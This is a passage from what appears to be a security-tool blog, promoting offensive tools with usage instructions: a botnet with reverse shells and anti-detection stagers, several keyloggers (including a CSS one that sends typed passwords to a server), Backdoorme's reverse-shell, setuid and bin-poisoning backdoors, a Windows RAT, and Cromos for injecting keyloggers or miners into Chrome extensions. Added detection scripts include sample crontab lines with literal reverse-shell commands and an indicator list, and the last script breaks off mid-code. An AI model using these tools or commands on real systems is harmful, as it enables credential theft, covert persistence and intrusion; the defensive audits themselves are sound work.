<li><strong>Utilities</strong> (<code>byob.core.util</code>): miscellaneous utility functions that are used by many modules</li>
<li><strong>Security</strong> (<code>byob.core.security</code>): Diffie-Hellman IKE & 3 encryption modes (AES-256-OCB, AES-256-CBC, XOR-128)</li>
<li><strong>Loaders</strong> (<code>byob.core.loaders</code>): remotely import any package/module/scripts from the server</li>
<li><strong>Payloads</strong> (<code>byob.core.payloads</code>): reverse TCP shell designed to remotely import dependencies, packages & modules</li>
<li><strong>Stagers</strong> (<code>byob.core.stagers</code>): generate unique payload stagers to prevent analysis & detection</li>
<li><strong>Generators</strong> (<code>byob.core.generators</code>): functions which all dynamically generate code for the client generator</li>
<li><strong>Database</strong> (<code>byob.core.database</code>): handles interaction between command & control server and the SQLite database</li>
</ol>
<br />
<b><span style="font-size: large;">Contact</span></b><br />
<strong>Website</strong>: <a href="https://malwared.com/" rel="nofollow" target="_blank">https://malwared.com</a><br />
<strong>Email</strong>: <a href="mailto:security@malwared.com" rel="nofollow" target="_blank">security@malwared.com</a><br />
<strong>Twitter</strong>: <a href="https://twitter.com/malwaredllc">https://twitter.com/malwaredllc</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/malwaredllc/byob" rel="nofollow" target="_blank">Download BYOB</a></span></b></div>
Spykeyboard - Keylogger Which Sends Us The Data To Our Gmail (2018-09-02)<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-RSIEGCGyv7g/W4r3lPySlqI/AAAAAAAAMWc/5P9O4HRpaFskzvloV6ylXKq2uJOLa7QeACLcBGAs/s1600/Spykeyboard_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="1280" height="400" src="https://2.bp.blogspot.com/-RSIEGCGyv7g/W4r3lPySlqI/AAAAAAAAMWc/5P9O4HRpaFskzvloV6ylXKq2uJOLa7QeACLcBGAs/s640/Spykeyboard_1.png" width="640" /></a></div>
<br />
This is a script which allows us to generate an undetectable <a href="http://www.kitploit.com/search/label/Keylogger">keylogger</a> which sends the captured keys to our Gmail account. Once we have generated our keylogger on our <a href="http://www.kitploit.com/search/label/Kali%20Linux">Kali Linux</a> machine, we have to copy the .py file to a <a href="http://www.kitploit.com/search/label/Windows">Windows</a> machine to convert it to an .exe. The tool is under development.<br />
<br />
Install module in linux and windows:<br />
<pre><code>pip install keyboard</code></pre>
<br />
<span style="font-size: large;"><b>Compile to .exe</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8JFqVUCfB7o/W4r3qIUaBPI/AAAAAAAAMWg/1JTtqnVnPlEemADI8TxGfQmmpVez7gAdwCLcBGAs/s1600/Spykeyboard_2_Screenshot%252520%252839%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="706" data-original-width="1521" height="296" src="https://4.bp.blogspot.com/-8JFqVUCfB7o/W4r3qIUaBPI/AAAAAAAAMWg/1JTtqnVnPlEemADI8TxGfQmmpVez7gAdwCLcBGAs/s640/Spykeyboard_2_Screenshot%252520%252839%2529.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/Sh4rk0-666/Spykeyboard" rel="nofollow" target="_blank">Download Spykeyboard</a></span></b></div>
CSS Keylogger - Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS (2018-06-04)<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XYpssw1ZQBg/WxTY8Do5YfI/AAAAAAAALas/xa8oA6ayPDkuT9TWzE7qoSSH9haso_mMgCLcBGAs/s1600/CSS-Keylogger.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1067" data-original-width="1600" height="426" src="https://2.bp.blogspot.com/-XYpssw1ZQBg/WxTY8Do5YfI/AAAAAAAALas/xa8oA6ayPDkuT9TWzE7qoSSH9haso_mMgCLcBGAs/s640/CSS-Keylogger.jpeg" width="640" /></a></div>
<br />
Chrome extension and Express <a href="http://www.kitploit.com/search/label/Server">server</a> that <a href="http://www.kitploit.com/search/label/Exploits">exploits</a> keylogging abilities of CSS.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>To use</b></span><br />
<br />
<b>Setup <a href="http://www.kitploit.com/search/label/Chrome">Chrome</a> extension</b><br />
<ol>
<li>Download repository <code>git clone https://github.com/maxchehab/CSS-Keylogging</code></li>
<li>Visit <code>chrome://extensions</code> in your browser (or open the Chrome menu by clicking the icon to the far right of the Omnibox; the menu's icon is three horizontal bars; then select Extensions under the More Tools menu to get to the same place).</li>
<li>Ensure that the Developer mode checkbox in the top right-hand corner is checked.</li>
<li>Click <code>Load unpacked extension…</code> to pop up a file-selection dialog.</li>
<li>Select the <code>css-keylogger-extension</code> in the directory which you downloaded this repository.</li>
</ol>
<br />
<b>Setup Express server</b><br />
<ol>
<li><code>yarn</code></li>
<li><code>yarn start</code></li>
</ol>
<br />
<b>Haxking l33t passw0rds</b><br />
<ol>
<li>Open a website that uses a controlled component framework such as React, for example <a href="https://www.instagram.com/" rel="nofollow" target="_blank">https://instagram.com</a>.</li>
<li>Press the extension <code>C</code> on the top right of any webpage.</li>
<li>Type your password.</li>
<li>Your password should be captured by the express server.</li>
</ol>
<br />
<span style="font-size: large;"><b>How it works</b></span><br />
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a <code>background-image</code>.<br />
For example, the following CSS selects all inputs whose <code>type</code> equals <code>password</code> and whose <code>value</code> ends with <code>a</code>, and then tries to load an image from <code>http://localhost:3000/a</code>.<br />
<div>
<pre><code>input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}</code></pre>
</div>
Using a simple <a href="https://github.com/maxchehab/CSS-Keylogging/blob/master/build.go" rel="nofollow" target="_blank">script</a> one can create a <a href="https://github.com/maxchehab/CSS-Keylogging/blob/master/css-keylogger-extension/keylogger.css" rel="nofollow" target="_blank">css file</a> that will send a custom request for every ASCII character.<br />
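The selector pattern just described is also what a defender can scan for. The following is an added example and not code from the CSS-Keylogger project: it parses a stylesheet into rules and flags any rule whose selector tests an element's <code>value</code> attribute while one of its declarations fetches a URL from a host other than the page's own. The stylesheet text, the page origin <code>https://page.example/</code> and the collector hosts are constructed for the illustration.

```javascript
// Added example, not part of the CSS-Keylogger project: a defender-side scan
// of a stylesheet for the attribute-selector exfiltration pattern described
// above. A rule is flagged when its selector matches on an element's `value`
// attribute and one of its declarations fetches a URL from a foreign host.

// Constructed sample stylesheet (assumption: the page it would be served on
// lives at https://page.example/). It repeats the write-up's pattern twice,
// adds a ^= variant under @media with another collector host, and one benign rule.
const SAMPLE_CSS = `
/* constructed sample */
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
input[type="password"][value$="b"] { background-image: url('http://localhost:3000/b'); }
.logo { background-image: url("/static/logo.png"); }
@media screen {
  input[name="q"][value^="x"] { background: url(https://collector.example/x) no-repeat; }
}
`;
const PAGE_ORIGIN = 'https://page.example/';

// One attribute selector on `value`: captures the operator and the operand.
const VALUE_ATTR_RE = /\[\s*value\s*([~|^$*]?=)\s*(?:"([^"]*)"|'([^']*)'|([^\]\s]+))\s*\]/gi;
// url(...) inside a declaration block, quoted or bare.
const URL_RE = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]+))\s*\)/gi;
// A flat "selector { declarations }" pair. Because only the innermost braces
// can form a match, rules nested in @media blocks are still examined and the
// @media prelude itself is skipped.
const RULE_RE = /([^{}]+)\{([^{}]*)\}/g;

function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// True when the URL resolves to a host other than the page's own.
function isForeign(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).host !== new URL(pageOrigin).host;
  } catch {
    return false; // unparsable URL: not a request the browser would make
  }
}

// Returns one finding per (value-selector, foreign URL) combination.
function findValueExfilRules(css, pageOrigin = PAGE_ORIGIN) {
  const findings = [];
  for (const [, selector, body] of stripComments(css).matchAll(RULE_RE)) {
    const attrs = [...selector.matchAll(VALUE_ATTR_RE)];
    if (attrs.length === 0) continue;
    const urls = [...body.matchAll(URL_RE)]
      .map(m => m[1] ?? m[2] ?? m[3])
      .filter(u => isForeign(u, pageOrigin));
    for (const a of attrs) {
      for (const url of urls) {
        findings.push({
          selector: selector.trim(),
          operator: a[1],
          operand: a[2] ?? a[3] ?? a[4],
          url,
          host: new URL(url, pageOrigin).host,
        });
      }
    }
  }
  return findings;
}

// Distinct collector hosts, sorted, ready for blocking or alerting.
function exfilHosts(css, pageOrigin = PAGE_ORIGIN) {
  return [...new Set(findValueExfilRules(css, pageOrigin).map(f => f.host))].sort();
}

console.log(findValueExfilRules(SAMPLE_CSS));
console.log(exfilHosts(SAMPLE_CSS));
```

Run it with Node; a stylesheet pulled from a suspicious extension or an injected style tag can be passed in place of <code>SAMPLE_CSS</code>. As a complementary control, a Content Security Policy whose <code>img-src</code> directive is limited to the page's own origin stops the browser from issuing these background-image requests in the first place, and a framework that does not mirror the typed value into the <code>value</code> attribute leaves the selector nothing to match.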
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/maxchehab/CSS-Keylogging" rel="nofollow" target="_blank">Download CSS Keylogger</a></span></b></div>
Backdoorme - Powerful Auto-Backdooring Utility (2018-06-03)<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-9Ciu2VTBxAw/WxBG4ckX-II/AAAAAAAALXU/pjf1eoxaAcQ_xt23sMj9W6Du20GJxBxEACLcBGAs/s1600/backdoorme_2.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1067" height="358" src="https://4.bp.blogspot.com/-9Ciu2VTBxAw/WxBG4ckX-II/AAAAAAAALXU/pjf1eoxaAcQ_xt23sMj9W6Du20GJxBxEACLcBGAs/s640/backdoorme_2.gif" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.</div>
<div style="text-align: justify;">
Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.</div>
<div style="text-align: justify;">
Please only use Backdoorme with explicit permission - please don't hack without asking.</div>
<a name='more'></a><br />
<span style="font-size: large;"><b>Usage</b></span><br />
Backdoorme is split into two parts: backdoors and modules.<br />
Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.<br />
Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.<br />
<br />
<b>Setup</b><br />
To start backdoorme, first ensure that you have the required dependencies.<br />
For Python 3.5+:<br />
<pre><code>$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt</code></pre>
For Python 2.7:<br />
<pre><code>$ sudo python dependencies.py</code></pre>
<br />
<b>Getting Started</b><br />
Launching backdoorme:<br />
<pre><code>$ python master.py</code></pre>
To add a target:<br />
<pre><code>>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>></code></pre>
<br />
<b>Backdoors</b><br />
To use a backdoor, simply run the "use" keyword.<br />
<pre><code>>> use shell/metasploit
+ Using current target 1.
+ Using <a href="http://www.kitploit.com/search/label/Metasploit">Metasploit</a> backdoor...
(msf) >></code></pre>
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.<br />
<pre><code>(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...</code></pre>
As in metasploit, backdoors are organized by category.<br />
<ul>
<li>Auxiliary<ul>
<li><strong>keylogger</strong> - Adds a keylogger to the system and gives the option to email results back to you.</li>
<li><strong>simplehttp</strong> - installs python's SimpleHTTP server on the client.</li>
<li><strong>user</strong> - adds a new user to the target.</li>
<li><strong>web</strong> - installs an Apache Server on the client.</li>
</ul>
</li>
<li>Escalation<ul>
<li><strong>setuid</strong> - the SetUID backdoor sets the setuid bit on a binary while the attacker has root access, so that when that binary is later run by an unprivileged user it executes as root. By default it flips the setuid bit on nano, so that if root access is ever lost the attacker can SSH back in as an unprivileged user and still run nano (or any chosen binary) as root, e.g. 'nano /etc/shadow'. Root access is required to deploy this escalation backdoor.</li>
<li><strong>shell</strong> - the shell backdoor is a <a href="http://www.kitploit.com/search/label/Privilege%20Escalation">privilege escalation</a> backdoor, similar to (but more specific than) its SetUID sibling. It copies the bash binary to a hidden file and sets the SUID bit on the copy. Root access is required to deploy it. To use it, while SSHed in as an unprivileged user, run ".bash -p" (the -p flag stops bash from dropping the effective UID back to the real one) and you will have a root shell.</li>
</ul>
</li>
<li>Shell<ul>
<li><strong>bash</strong> - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.</li>
<li><strong>bash2</strong> - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.</li>
<li><strong>sh</strong> - Similar to the first bash backdoor, but redirects input to /bin/sh.</li>
<li><strong>sh2</strong> - Similar to the second bash backdoor, but redirects input to /bin/sh.</li>
<li><strong>metasploit</strong> - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a <a href="http://www.kitploit.com/search/label/Meterpreter">meterpreter</a> shell.</li>
<li><strong>java</strong> - creates a socket connection using libraries from Java and compiles the backdoor on the target.</li>
<li><strong>ruby</strong> - uses ruby's libraries to create a connection, then redirects to /bin/bash.</li>
<li><strong>netcat</strong> - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.</li>
<li><strong>netcat_traditional</strong> - utilizes netcat-traditional's -e option to create a reverse shell.</li>
<li><strong>perl</strong> - a script written in perl which redirects output to bash, and renames the process to look less conspicuous.</li>
<li><strong>php</strong> - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead relies on the web module.</li>
<li><strong>python</strong> - uses a short python script to perform commands and send output back to the user.</li>
<li><strong>web</strong> - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.</li>
</ul>
</li>
<li>Access<ul>
<li><strong>remove_ssh</strong> - removes the <a href="http://www.kitploit.com/search/label/SSH%20server">ssh server</a> on the client. Often used at the end of a <a href="http://www.kitploit.com/search/label/BackdoorMe">backdoorme</a> session to close the original SSH access path; note that it removes only the SSH server, not anything else the session left behind.</li>
<li><strong>ssh_key</strong> - creates RSA key and copies to target for a passwordless ssh connection.</li>
<li><strong>ssh_port</strong> - Adds a new port for ssh.</li>
</ul>
</li>
<li>Windows<ul>
<li><strong>windows</strong> - Uses msfvenom to create a windows backdoor.</li>
</ul>
</li>
</ul>
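Both escalation backdoors above leave the same artefact on disk: a root-owned file carrying the setuid bit that has no business being setuid (an editor such as nano, or a hidden copy of bash). The script below is an added example, not code from Backdoorme, showing how a responder can audit that. It parses the output of <code>find / -xdev -type f -perm -4000 -printf '%m %u %p\n'</code> (octal mode, owner, path) and reports anything outside a baseline. The baseline set and the sample find output are constructed for the example; build a real baseline from a known-good image.

```python
"""Added example (not part of Backdoorme): audit setuid files against a baseline."""
import os
import stat

# Hypothetical baseline: the setuid files a freshly installed host is expected
# to have.  Constructed for the example; derive yours from a known-good image.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/mount",
}

# Interactive tools that hand over a shell or arbitrary file access if setuid.
SHELL_CAPABLE = {"bash", "sh", "dash", "zsh", "nano", "vim", "vi", "less",
                 "more", "python", "python3", "perl", "find"}


def parse_find_line(line):
    """Parse one 'MODE USER PATH' line from find -printf; paths may contain spaces."""
    mode, user, path = line.rstrip("\n").split(" ", 2)
    return int(mode, 8), user, path


def audit_setuid(find_output, baseline=BASELINE):
    """Return a list of (path, reason) findings for suspicious setuid files."""
    findings = []
    for line in find_output.splitlines():
        if not line.strip():
            continue
        mode, user, path = parse_find_line(line)
        if not mode & stat.S_ISUID:        # only the setuid bit matters here
            continue
        if path in baseline:
            continue
        name = os.path.basename(path)
        if name.startswith("."):
            findings.append((path, "hidden setuid file"))
        elif name in SHELL_CAPABLE:
            findings.append((path, "setuid on shell-capable binary"))
        elif user == "root":
            findings.append((path, "root setuid file not in baseline"))
        else:
            findings.append((path, "setuid file not in baseline"))
    return findings


# Constructed sample output of the find command above (not from a real host).
SAMPLE_FIND_OUTPUT = """\
4755 root /usr/bin/sudo
4755 root /usr/bin/passwd
4755 root /usr/bin/su
4755 root /usr/bin/nano
4755 root /home/victim/.bash
4755 root /usr/local/bin/helper
4755 victim /home/victim/bin/tool
"""

if __name__ == "__main__":
    for path, reason in audit_setuid(SAMPLE_FIND_OUTPUT):
        print(f"{path}: {reason}")
```

Run it against real output by piping the find command into the script instead of using the sample; the point of the baseline is that every line not in it needs an explanation, and "shell-capable" and "hidden" are just the two explanations that match what these backdoors do.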
<br />
<b>Modules</b><br />
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.<br />
<pre><code>(msf) >> add poison
+ Poison module added</code></pre>
Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.<br />
<pre><code>(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False</code></pre>
Currently enabled modules include:<br />
<ul>
<li>Poison<ul>
<li>Performs bin poisoning on the target computer: it compiles an executable that calls a system utility and an existing backdoor.</li>
<li>For example, if the bin poisoning module is triggered with "ls", it compiles and installs a binary called "ls" that runs both an existing backdoor and the original "ls", thereby tricking the user into running the existing backdoor more frequently.</li>
</ul>
</li>
<li>Cron<ul>
<li>Adds an existing backdoor to the root user's crontab to run with a given frequency.</li>
</ul>
</li>
<li>Web<ul>
<li>Sets up a web server and places a web page which triggers the backdoor.</li>
<li>Simply visit the site with your listener open and the backdoor will begin.</li>
</ul>
</li>
<li>User<ul>
<li>Adds a new user to the target.</li>
</ul>
</li>
<li>Startup<ul>
<li>Allows for backdoors to be spawned from the bashrc and init files.</li>
</ul>
</li>
<li>Whitelist<ul>
<li>Whitelists an IP so that only that IP can connect to the backdoor.</li>
</ul>
</li>
</ul>
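The Cron and Poison modules both leave traces a responder already collects: a crontab entry whose command looks like a reverse shell or an interpreter one-liner, and a packaged binary (the poisoned "ls") whose checksum no longer matches its package. The script below is an added example, not part of Backdoorme, with two checks: it parses crontab text (root's <code>crontab -l</code>, /etc/crontab or /etc/cron.d files) for reverse-shell indicators, and it parses <code>dpkg --verify</code> output for files whose md5sum check failed. The indicator list, the sample crontab and the sample dpkg lines are constructed for the example.

```python
"""Added example (not part of Backdoorme): spot cron persistence and poisoned binaries."""
import re

# Indicators of a reverse shell or interpreter one-liner in a cron command.
# Constructed for the example; extend for your environment.
SHELL_INDICATORS = [
    (r"/dev/tcp/", "bash /dev/tcp redirection"),
    (r"\bnc\b.*\s-e\s|\bncat\b.*\s-e\s|netcat.*\s-e\s", "netcat -e"),
    (r"\b(bash|sh)\s+-i\b", "interactive shell"),
    (r"\b(python\d?|perl|ruby|php)\s+-[cer]\s", "interpreter one-liner"),
    (r"(^|[\s/])\.[A-Za-z0-9_-]+(\s|$)", "hidden path"),
    (r"curl\s.*\|\s*(ba)?sh|wget\s.*\|\s*(ba)?sh", "download-and-run"),
]


def parse_crontab(text):
    """Yield (schedule, command) per entry, skipping comments, blank lines and
    VAR=value lines.  '@reboot'-style shortcuts are one field; standard entries
    are five.  For /etc/crontab and /etc/cron.d the user name stays in the
    command string, which does not affect the indicator matching."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        yield schedule, command.strip()


def audit_crontab(text):
    """Return (schedule, command, reason) for entries matching an indicator."""
    findings = []
    for schedule, command in parse_crontab(text):
        for pattern, reason in SHELL_INDICATORS:
            if re.search(pattern, command):
                findings.append((schedule, command, reason))
                break
    return findings


def modified_package_files(dpkg_verify_output):
    """Parse 'dpkg --verify' output (rpm-style format) and return paths whose
    md5sum check failed.  Each line is a 9-character status field, an optional
    'c' (conffile) flag and the path; a '5' in the third position means the
    file's md5sum differs from what the package shipped."""
    changed = []
    for line in dpkg_verify_output.splitlines():
        m = re.match(r"^(\S{9})\s+(?:c\s+)?(/\S.*)$", line)
        if m and m.group(1)[2] == "5":
            changed.append(m.group(2))
    return changed


# Constructed sample root crontab (not from a real host).
SAMPLE_ROOT_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
0 3 * * * /usr/bin/apt-get update -q
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.1.0.1/4444 0>&1'
@reboot /home/victim/.bash -p
30 * * * * nc 10.1.0.1 4444 -e /bin/sh
"""

# Constructed sample 'dpkg --verify' output: a replaced ls and an edited conffile.
SAMPLE_DPKG_VERIFY = """\
??5??????   /usr/bin/ls
??5?????? c /etc/ssh/sshd_config
"""

if __name__ == "__main__":
    for schedule, command, reason in audit_crontab(SAMPLE_ROOT_CRONTAB):
        print(f"[{reason}] {schedule} {command}")
    for path in modified_package_files(SAMPLE_DPKG_VERIFY):
        print(f"[package file modified] {path}")
```

The dpkg check only covers files a package owns, so a poisoned wrapper dropped into a directory outside the package database will not appear there; pair it with the setuid audit and a path-order check (a second "ls" earlier in PATH than /bin/ls).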
<br />
<b>Targets</b><br />
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/Kkevsterrr/backdoorme" rel="nofollow" target="_blank">Download Backdoorme</a></span></b></div>
<br /><b>CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems</b> (2018-04-02)<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uiOtRO_8NTU/WsA5T12xkaI/AAAAAAAAKt8/9NKsoODPo0kb9ML6ySmSmFIV9M9RcbTpgCLcBGAs/s1600/CHAOS_7_screenshot.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="432" data-original-width="712" src="https://1.bp.blogspot.com/-uiOtRO_8NTU/WsA5T12xkaI/AAAAAAAAKt8/9NKsoODPo0kb9ML6ySmSmFIV9M9RcbTpgCLcBGAs/s1600/CHAOS_7_screenshot.gif" /></a></div>
<br />
CHAOS lets you generate payloads and control <a href="http://www.kitploit.com/search/label/Remote">remote</a> <a href="http://www.kitploit.com/search/label/Windows">Windows</a> systems.</div>
<br />
<span style="font-size: x-large;"><b>Disclaimer</b></span><br />
<div style="text-align: center;">
<div style="text-align: left;">
This project was created only for learning purposes.</div>
</div>
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.<br />
<br />
<span style="font-size: x-large;"><b>Features</b></span><br />
<ul class="contains-task-list">
<li class="task-list-item">Reverse Shell</li>
<li class="task-list-item">Download File</li>
<li class="task-list-item">Upload File</li>
<li class="task-list-item">Screenshot</li>
<li class="task-list-item"><a href="http://www.kitploit.com/search/label/Keylogger">Keylogger</a></li>
<li class="task-list-item">Persistence</li>
<li class="task-list-item">Open URL Remotely</li>
<li class="task-list-item">Get Operating System Name</li>
<li class="task-list-item">Run Fork Bomb</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Tested On</b></span><br />
<a href="https://www.kali.org/" rel="nofollow" target="_blank"><strong>Kali Linux - ROLLING EDITION</strong></a><br />
<br />
<span style="font-size: x-large;"><b>How To Use</b></span><br />
<div>
<pre><code># Install dependencies (you need Go and UPX installed)
$ apt install golang xterm git upx-ucl -y
# Clone this repository
$ git clone https://github.com/tiagorlampert/CHAOS.git
# Get and install external imports (required for the screenshot feature)
$ go get github.com/kbinani/screenshot && go get github.com/lxn/win
$ go install github.com/kbinani/screenshot && go install github.com/lxn/win
# You may see the message "package github.com/lxn/win: build constraints exclude all Go files".
# This happens because these libraries are Windows-only, but they are still needed to build the payload.
# Go into the repository
$ cd CHAOS
# Run
$ go run CHAOS.go</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>Video</b></span><br />
<div align="center">
<br /></div>
<div align="center">
<iframe allow="autoplay; encrypted-media" allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/9P-3qSA_ZjQ" width="640"></iframe></div>
<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/tiagorlampert/CHAOS" rel="nofollow" target="_blank">Download CHAOS</a></span></b></div>
<br /><b>Cromos - Download and Inject code into Google Chrome extensions</b> (2017-11-08)<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-kepgNdYPTvo/WgKPuGRRKyI/AAAAAAAAJWw/0WTCHbicPCQ7BqhGkza3hR_8_SpwlWeqgCLcBGAs/s1600/cromos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="620" src="https://2.bp.blogspot.com/-kepgNdYPTvo/WgKPuGRRKyI/AAAAAAAAJWw/0WTCHbicPCQ7BqhGkza3hR_8_SpwlWeqgCLcBGAs/s1600/cromos.png" /></a></div>
<br />
<div style="text-align: justify;">
Cromos is a tool for downloading legitimate extensions from the Chrome Web Store and injecting code into the extension's background. It can also create executable files that force installation, via <strong>PowerShell</strong> for example, and upload files to <a href="http://www.kitploit.com/search/label/Dropbox">Dropbox</a> to host the malicious files.</div>
<ul>
<li style="text-align: justify;">Download extension</li>
<li style="text-align: justify;">Injections</li>
<li style="text-align: justify;">Upload files on dropbox</li>
<li style="text-align: justify;">Windows infection</li>
</ul>
<div style="text-align: justify;">
</div>
<br />
<div style="text-align: justify;">
<b>Group Policy Object (GPO)</b></div>
<div style="text-align: justify;">
Chrome allows you to add extensions using a Windows Group Policy Object (GPO). If you need to force installation on multiple machines, follow the steps in the <a href="https://docs.google.com/document/d/1iu6I0MhyrvyS5h5re5ai8RSVO2sYx2gWI4Zk4Tp6fgc" rel="nofollow" target="_blank"> Chrome Deployment Guide </a>. Alternatively, after making a few modifications to the original extension you can publish it in the Chrome Web Store, which requires paying a $5 fee.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Support</b></div>
<div style="text-align: justify;">
If you choose to generate a batch file to force installation, the <a href="http://www.kitploit.com/search/label/PowerShell">PowerShell</a> script it downloads is compatible with Windows 7, 8 and 10 running PowerShell >= 3.0.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Demo</b></div>
<div style="text-align: justify;">
This is a demonstration of the tool at work. In this example I'm downloading a popular Google extension called G Suite Training from the Chrome Web Store and injecting the <a href="http://www.kitploit.com/search/label/Keylogger">keylogger</a> module.</div>
<div style="text-align: center;">
<a href="https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd" rel="nofollow" target="_blank">asciinema recording of the demo</a></div>
<br />
<b><span style="font-size: large;">Installation</span></b><br />
<pre><code>$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py</code></pre>
<br />
<b><span style="font-size: large;">Usage</span></b><br />
<br />
<b>Downloading the extension</b><br />
<pre><code>Usage: python cromos.py --extension {id}</code></pre>
<br />
<b>Downloading the extension and loading module</b><br />
<pre><code>Usage: python cromos.py --extension {id} --load {currency/keylogger}</code></pre>
<br />
<b>Build a batch file and upload the files in dropbox</b><br />
<pre><code>Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}</code></pre>
<br />
<b>Modules</b><br />
You can also inject predefined modules into the extension's background, such as a <strong>keylogger</strong> or a <strong>virtual currency</strong> miner.<br />
<table> <thead>
<tr> <th>Module</th> <th>Description</th> </tr>
</thead> <tbody>
<tr> <td>modules/keylogger</td> <td>This module captures all the <a href="http://www.kitploit.com/search/label/Passwords">passwords</a> typed in an infected browser, over HTTPS or not. All you need is a server (a PHP script, for example) to receive the requests; they are sent as GET requests whose parameters are email, password, <a href="http://www.kitploit.com/search/label/Cookies">cookies</a> and userAgent.</td> </tr>
<tr> <td>modules/currency</td> <td>This module mines virtual currency using the Coinhive API; you only need a Coinhive account.</td> </tr>
</tbody></table>
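Because the keylogger module reports with a GET request that carries the captured password and cookies in the query string, the exfiltration is visible in the receiving server's access log, and more generally a password in a GET query string is rare enough in legitimate traffic to hunt for. The script below is an added example, not part of Cromos: it parses Apache/nginx combined-format log lines and flags requests whose query string contains a sensitive parameter name. The log lines, IP addresses and the parameter list are constructed for the example.

```python
"""Added example (not part of Cromos): find credentials passed in URL query strings."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status size ...
COMBINED_LOG = re.compile(
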